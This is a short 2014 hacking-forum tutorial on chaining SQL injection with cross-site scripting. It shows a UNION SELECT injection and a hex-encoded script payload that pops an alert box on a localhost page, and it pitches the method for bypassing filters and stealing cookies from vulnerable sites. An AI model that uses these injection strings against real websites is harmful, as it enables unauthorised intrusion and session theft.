[Tutorial] XSSQLi 01-27-2014, 01:58 PM
#1
[*]Introduction
Hello HC Reader , Today i m going to find SQLi tutorial in this forum , but Only found "Union Select Statement" "Easy Injection" "Noob Injection" :Confused: But Now I will explain to you how to perform a XSS via SQL Injection. (XSSQLi) . What do u think if we have sqli vulnerability ? and What we can do more ? :Nerd: "I'm always find admin table and admin page " :Ambivalent: :Slant:
Sometime we are going to inject with sqli , but doesn't have a login page . So , what will you do this Sqli Vuln site ? (Skip or next one :troll: ) Don't Skip , let's Bypassing some filter or stealing cookies with XSS .
[*]Let's Start
First of all you will need a target which is vulnerable to SQL injection . But Let's follow my target .
Quote:localhost/groupinfo.php?show=2
Now we have to inject the columns number and do a Union Statement , I might , you will know well how about SQLi , So Let me skip . :Innocent:
Quote:localhost/groupinfo.php?show=null UNION SELECT 1,2,3,4,5,6--
After that you have found the vulnerable column , So you need to add the XSS payload to the union statement. Like this ,
[*]Xss Payload:
Quote:<script>alert("Hello HC")</script>
[*]Hex Encoded Payload:
Quote:localhost/groupinfo.php?show=null UNION SELECT 1,0x3c7363726970743e616c657274282248656c6c6f20484322293c2f7363726970743e,3,4,5,6--
* Remember: Encoding your payload into HEX with 0x: .
So , Enter :troll: We have get Alert Box :troll:
![[Image: Snap134.png]](http://s12.postimg.org/q0q9izifx/Snap134.png)
Thanks for reading and if u didn't understand well , PM to me
My Pleasure :troll:
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)